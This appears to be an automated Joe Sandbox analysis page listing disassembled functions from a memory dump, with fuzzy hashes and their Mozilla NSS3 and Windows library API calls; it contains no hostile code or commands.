Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalCurrentEnterSectionThreadUnlock$GrowGrow_Mark_
String ID:
API String ID: 3225201373-0
Opcode ID: 308e4270f0920112789097d68b8b91efb05288d23b13fd1fcd1cfa9c47fd2795
Instruction ID: 44bf1a3a084c67612dbeec1ba353842df7c2a238d14330379e227049cf280368
Opcode Fuzzy Hash: 308e4270f0920112789097d68b8b91efb05288d23b13fd1fcd1cfa9c47fd2795
Instruction Fuzzy Hash: B76139B4A00611DFD704CF19D685B517BF0BF58308F1692AAE9488FB62EB71E854CF90

Function 6C7D6A70 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

DER_GetInteger_Util.NSS3(?), ref: 6C7D6ABF

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Integer_Util
String ID:
API String ID: 2649942920-0
Opcode ID: 259afa9fab1dbe955e60e33da951a3297ad2d979d4eee7f9a913672db26df2d0
Instruction ID: 57dcc149df5fde9997d9b516b56ede9ae4329607aa338f041d1fe1d6deb283b5
Opcode Fuzzy Hash: 259afa9fab1dbe955e60e33da951a3297ad2d979d4eee7f9a913672db26df2d0
Instruction Fuzzy Hash: 265129B09017048FE724CF25EA45B967BE4EB08318F12492DE49EC7A52E731F504CB95

Function 6C7AEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C7AEF38

Part of subcall function 6C799520: PK11_IsLoggedIn.NSS3(00000000,?,6C7C379E,?,00000001,?), ref: 6C799542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6C7AEF53

Part of subcall function 6C7B4C20: TlsGetValue.KERNEL32 ref: 6C7B4C4C
Part of subcall function 6C7B4C20: EnterCriticalSection.KERNEL32(?), ref: 6C7B4C60
Part of subcall function 6C7B4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CA1
Part of subcall function 6C7B4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CBE
Part of subcall function 6C7B4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CD2
Part of subcall function 6C7B4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D3A

PR_GetCurrentThread.NSS3 ref: 6C7AEF9E

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

free.MOZGLUE(00000000), ref: 6C7AEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7AF016
free.MOZGLUE(00000000), ref: 6C7AF022

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: f93a7f44fc8bca8d5e9ff4f3004b92a8dd31800c26dda5a6318abc1bca3bb6a6
Instruction ID: 9bdd7d257898780588dab47f6d8778b8eb44ce1930af9f0b0bca7065d0750c80
Opcode Fuzzy Hash: f93a7f44fc8bca8d5e9ff4f3004b92a8dd31800c26dda5a6318abc1bca3bb6a6
Instruction Fuzzy Hash: 8C4181B1E00209AFDF018FE9DD45AEF7BB9EB48358F004135F914A6351E771D9168BA1

Function 6C784860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C784894

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7848CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7848DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C7848FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C784912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C78494A

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: bc00f3f6e40b6e2613db28d873d9bea4d11e8febc745b5618e50688c44d92c80
Instruction ID: e13127cab6cf2baf503d98c67d4d1e246ddb804893df9d08b85ec0bc1ee45598
Opcode Fuzzy Hash: bc00f3f6e40b6e2613db28d873d9bea4d11e8febc745b5618e50688c44d92c80
Instruction Fuzzy Hash: 9441C171A06305ABE710CA6ACA94BAA77EC9B44718F40053CFA5587741F7B0E908DB52

Function 6C808AF0 Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,00000000,?,?,6C7F6F38), ref: 6C808B0B
NSS_OptionGet.NSS3(00000008,?), ref: 6C808B58
NSS_OptionGet.NSS3(00000009,?), ref: 6C808B6A
NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,?,?,00000000,?,?,6C7F6F38), ref: 6C808BBB
NSS_OptionGet.NSS3(0000000A,?), ref: 6C808C08
NSS_OptionGet.NSS3(0000000B,?), ref: 6C808C1A

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Option$AlgorithmPolicy
String ID:
API String ID: 927613807-0
Opcode ID: 18c152498bce43c79d722d64fb580102a601dea69bd9ca852328a5a3d2eccf3f
Instruction ID: 2eb6784159e6420cea859d189095a91e3279ce6b9767f9461a5e5f5cd65266de
Opcode Fuzzy Hash: 18c152498bce43c79d722d64fb580102a601dea69bd9ca852328a5a3d2eccf3f
Instruction Fuzzy Hash: DC414961B021099BEF309E99CEA0BEE36B5DB5131CF944833CD49D7680E3206AC5C7D2

Function 6C79CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6C79CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6C79D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C79D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79D025
PR_NewLock.NSS3 ref: 6C79D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C79D074

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: df00ef3378ebffe5f59bbc8477ba2269a234ba212747add337c522fa98f8d0bb
Instruction ID: d885752772d619aa4e9e7f2209542304c151ccee161ede9bdb4d8f0d6d60f2f4
Opcode Fuzzy Hash: df00ef3378ebffe5f59bbc8477ba2269a234ba212747add337c522fa98f8d0bb
Instruction Fuzzy Hash: 3C41AEB1A012118FDB10DF2DEA8579ABBA4AF18318F10417ADC1D8BB46D774D885CBE5

Function 6C7D8810 Relevance: 9.1, APIs: 6, Instructions: 110memorythreadCOMMON

Download Yara Rule

APIs

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,?,6C7D86AA), ref: 6C7D8851

Part of subcall function 6C7D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D136A
Part of subcall function 6C7D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D137E
Part of subcall function 6C7D1340: PL_ArenaGrow.NSS3(?,6C76F599,?,00000000,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?), ref: 6C7D13CF
Part of subcall function 6C7D1340: PR_Unlock.NSS3(?,?,6C77895A,00000000,?,00000000,?,00000000,?,00000000,?,6C76F599,?,00000000), ref: 6C7D145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,6C7D86AA), ref: 6C7D886C
PORT_ArenaAlloc_Util.NSS3(?,0000002C), ref: 6C7D8890
PR_GetCurrentThread.NSS3 ref: 6C7D891C
PR_GetCurrentThread.NSS3 ref: 6C7D8937

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_CurrentThreadValue$CriticalEnterGrowGrow_SectionUnlock
String ID:
API String ID: 3779483720-0
Opcode ID: 81eb98ee20356f29331e48e9a8cf6d10175233b774d13f2b273e47d9987ca0a1
Instruction ID: 6ca712bb3295560f36710eaf72e60f57c215923cf016f63ca0594946af11c78d
Opcode Fuzzy Hash: 81eb98ee20356f29331e48e9a8cf6d10175233b774d13f2b273e47d9987ca0a1
Instruction Fuzzy Hash: DB41C4B0A01202EFE704CF29CA95B51BBA4FF04318F01927AD8588B751EB72F964CBD1

Function 6C7E8890 Relevance: 9.1, APIs: 6, Instructions: 106COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000004,?), ref: 6C7E88C0
PK11_HashBuf.NSS3(00000003,?,?,?), ref: 6C7E88E0
NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C7E8915
HASH_ResultLenByOidTag.NSS3(00000000), ref: 6C7E8928
PK11_HashBuf.NSS3(00000000,?,?,?), ref: 6C7E8957
PK11_HashBuf.NSS3(00000004,?,?,?), ref: 6C7E8980

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: HashK11_$AlgorithmPolicy$Result
String ID:
API String ID: 2238172455-0
Opcode ID: ef91085f909649cc36fe7970a8177aa7e47d72bf0be57d3e70b796a1683cfdb4
Instruction ID: 7faa6eac9807efcdf535644fcbb75a2defd363e6af957ab3219bd880b476b62c
Opcode Fuzzy Hash: ef91085f909649cc36fe7970a8177aa7e47d72bf0be57d3e70b796a1683cfdb4
Instruction Fuzzy Hash: 6631EA73D04119ABEB008EAD9F44BAB77989B09318F040132EE1497781F7319E14C3E3

Function 6C782E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C772D1A), ref: 6C782E7E

Part of subcall function 6C7D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C778298,?,?,?,6C76FCE5,?), ref: 6C7D07BF
Part of subcall function 6C7D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C7D07E6
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D081B
Part of subcall function 6C7D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D0825

PR_Now.NSS3 ref: 6C782EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C782EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C772D1A), ref: 6C782F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C772D1A), ref: 6C782F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C782F81

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: dbf33755e1961376bc859a043b8756a7964048b9a7f7e549ea18303b3a729a3b
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 6D31F3715031048BE710C665DE4CFAEB269EF8032AF64097AD629D7AD1EB31998AC621

Function 6C796B70 Relevance: 9.1, APIs: 6, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C796BA9

Part of subcall function 6C799520: PK11_IsLoggedIn.NSS3(00000000,?,6C7C379E,?,00000001,?), ref: 6C799542

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C796BC0
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C796BD7
PK11_HasAttributeSet.NSS3(?,?,00000002,00000000,?,?,?,?,00000007,?,00000000), ref: 6C796B97

Part of subcall function 6C7B1870: TlsGetValue.KERNEL32 ref: 6C7B18A6
Part of subcall function 6C7B1870: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C796C34,?,?,00000001,00000000,00000007,?), ref: 6C7B18B6
Part of subcall function 6C7B1870: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C796C34,?,?), ref: 6C7B18E1
Part of subcall function 6C7B1870: PR_SetError.NSS3(00000000,00000000), ref: 6C7B18F9

PK11_HasAttributeSet.NSS3(?,?,00000001,00000000,00000007,?,00000000), ref: 6C796C2F
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C796C61

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Util$Arena_Attribute$Alloc_ArenaAuthenticateCriticalEnterErrorFreeLoggedSectionUnlockValue
String ID:
API String ID: 2313852964-0
Opcode ID: 3defabc3b4d41339a6bc030261ce4b9d552ee16c80e1a7a24b3794307dc20c26
Instruction ID: 57fbde92ba90c732f76b993e9d1c6c1b3b7e0e9075f52507ef70059cc7235c20
Opcode Fuzzy Hash: 3defabc3b4d41339a6bc030261ce4b9d552ee16c80e1a7a24b3794307dc20c26
Instruction Fuzzy Hash: C73101B1A00301ABE7008F54EE85FAA7764EB06758F150129FD08AB382E771EA51C6E1

Function 6C770E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C770A2C), ref: 6C770E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C770A2C), ref: 6C770E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C770A2C), ref: 6C770E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C770A2C), ref: 6C770E90
free.MOZGLUE(00000000), ref: 6C770EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C770A2C), ref: 6C770ED9

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 4ed24f95403d7d1f3338b0f6196521122ba794be8b197488ea45beffe448d5da
Instruction ID: a88ff40b3ba9b94c28d6beb844c16cad50cec65c02ce570d88ef1c2f9bb13ead
Opcode Fuzzy Hash: 4ed24f95403d7d1f3338b0f6196521122ba794be8b197488ea45beffe448d5da
Instruction Fuzzy Hash: F2212E72B0028C57EF3065769E49B6B72AEDBC1748F194035D81853B42EAE2D81482B1

Function 6C75A9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6C839270), ref: 6C75A9BF
PR_IntervalToMilliseconds.NSS3(?,?,6C839270), ref: 6C75A9DE

Part of subcall function 6C75AB40: __aulldiv.LIBCMT ref: 6C75AB66

Part of subcall function 6C83CA40: LeaveCriticalSection.KERNEL32(?), ref: 6C83CAAB

LeaveCriticalSection.KERNEL32(?), ref: 6C75AA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6C75AA39
EnterCriticalSection.KERNEL32(?), ref: 6C75AA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C75AAEB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: e415eae25ebaa52542dd73e81fca7298f126579ddd3bf4e733d95b40ec820f78
Instruction ID: 2261e951fdd1b47408eb15b556e064ffd608068323b7aa77fd0119bdc1f04ccc
Opcode Fuzzy Hash: e415eae25ebaa52542dd73e81fca7298f126579ddd3bf4e733d95b40ec820f78
Instruction Fuzzy Hash: CF417E746047018FD7109F28C6847A6BBF1FB06328F64867DE45D8B641DF719992CBE0

Function 6C7888D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C790725,00000000,00000058), ref: 6C788906
EnterCriticalSection.KERNEL32(?), ref: 6C78891A
PL_ArenaAllocate.NSS3(?,?), ref: 6C78894A
calloc.MOZGLUE(00000001,6C79072D,00000000,00000000,00000000,?,6C790725,00000000,00000058), ref: 6C788959
memset.VCRUNTIME140(?,00000000,?), ref: 6C788993
PR_Unlock.NSS3(?), ref: 6C7889AF

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: 04ab7ba57e0c3747f6f2f4e5d291a5ca3bcc1e81872c88af3ca0a2bba4b8927e
Instruction ID: 1379e252d9b1d24f6884754aae5bbaccdc0edbb7d0fef1a0e85c68feb1920b8c
Opcode Fuzzy Hash: 04ab7ba57e0c3747f6f2f4e5d291a5ca3bcc1e81872c88af3ca0a2bba4b8927e
Instruction Fuzzy Hash: E9314472E02211ABD7009F28CD44A5ABBA8BF0531CF158636EE1CDBB42E731E945C7D2

Function 6C77AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C77AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C77AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C77AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C899500), ref: 6C77AF23

Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C7CF0C8
Part of subcall function 6C7CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7CF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77AF37

Memory Dump Source

